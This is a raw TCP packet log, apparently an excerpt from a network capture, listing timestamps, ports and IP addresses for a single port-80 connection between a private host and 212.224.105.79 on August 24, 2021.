Aug 24, 2021 08:49:11.698520899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698542118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.698548079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698573112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698585987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.698591948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698626041 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.780730963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.780798912 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.803363085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.803390980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.829866886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.843343973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.889354944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889379025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889389992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889403105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889415026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889432907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889447927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889462948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889477968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889493942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889509916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889523983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889542103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889559031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889564991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.889573097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889589071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889605045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889619112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889622927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.889632940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.889662027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.933304071 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.258708954 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.259216070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.281538010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.304975986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.326657057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.326795101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.349041939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.371862888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.389601946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.389637947 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.412033081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.437393904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.458683968 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.522483110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535315990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535357952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535371065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535383940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535399914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535414934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535432100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535446882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535451889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.535460949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535475969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535480976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.535496950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535507917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.535518885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535532951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.535538912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535558939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535567045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.535577059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535620928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.535676003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535747051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535748959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.535778046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535801888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535823107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.535850048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.535871983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536072016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536102057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536120892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536142111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536165953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536186934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536192894 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536214113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536236048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536241055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536258936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536279917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536281109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536303043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536324024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536345959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536364079 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536370039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536392927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536413908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536423922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536432028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536453962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536463976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536474943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536497116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536498070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536520958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536552906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536555052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536571026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536592960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536617041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536637068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536644936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536653996 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536659002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536670923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536683083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536699057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536703110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536719084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536731005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536731005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536750078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.536770105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.536794901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.545150995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559056997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559098005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559159040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559180975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559195995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559206009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559228897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559237957 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559252024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559272051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559273958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559293985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559307098 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559312105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559329033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559350967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559360027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559402943 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559428930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559453964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559477091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559478045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559498072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559524059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559549093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559564114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559585094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559604883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559608936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559626102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559627056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559679031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559701920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559719086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559739113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559753895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559761047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559784889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559791088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559808016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559828043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559838057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559850931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559871912 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559875011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559899092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559920073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559940100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559942007 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559967041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.559974909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.559992075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560013056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560034037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560034990 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560060024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560069084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560082912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560101032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560106039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560127020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560152054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560157061 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560173988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560192108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560213089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560220957 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560235023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560250044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560256004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560276985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560278893 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560297966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560322046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560323954 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560344934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560365915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560384035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560405970 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560406923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560430050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560437918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560452938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560461044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560473919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560489893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560538054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560610056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560631990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560651064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560672045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560681105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560693026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560714006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560714960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560739994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560762882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560781956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560785055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560807943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560816050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560831070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560852051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560854912 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560874939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560894012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560897112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560918093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560921907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560945988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.560945988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560967922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560990095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.560990095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561008930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561034918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561079025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561094999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561098099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561136961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561173916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561208963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561209917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561232090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561245918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561269999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561285973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561320066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561359882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561434984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561469078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561532021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561578035 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561580896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561619997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561623096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561657906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561690092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561723948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561748028 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561763048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561764956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561796904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561830044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561861038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561885118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561903000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.561908007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.561964035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.562000990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.562037945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.562043905 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.562081099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.562082052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.562117100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.562150002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.562191963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.567481041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.567513943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.567686081 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.574558973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.582660913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.582746983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.582778931 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.582787991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.582829952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.582864046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.582890034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.582905054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.582931995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.582942963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.582976103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.583007097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.583054066 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.583060026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.583066940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.583126068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.583167076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.583209991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.583210945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.583240986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.583259106 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.583287954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.583318949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.583349943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.583372116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.583403111 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584182024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584213972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584234953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584261894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584263086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584286928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584311962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584320068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584335089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584357023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584378958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584388018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584400892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584422112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584429979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584455013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584455967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584462881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584486008 CEST	80	49712	212.224.105.79	192.168.2.5
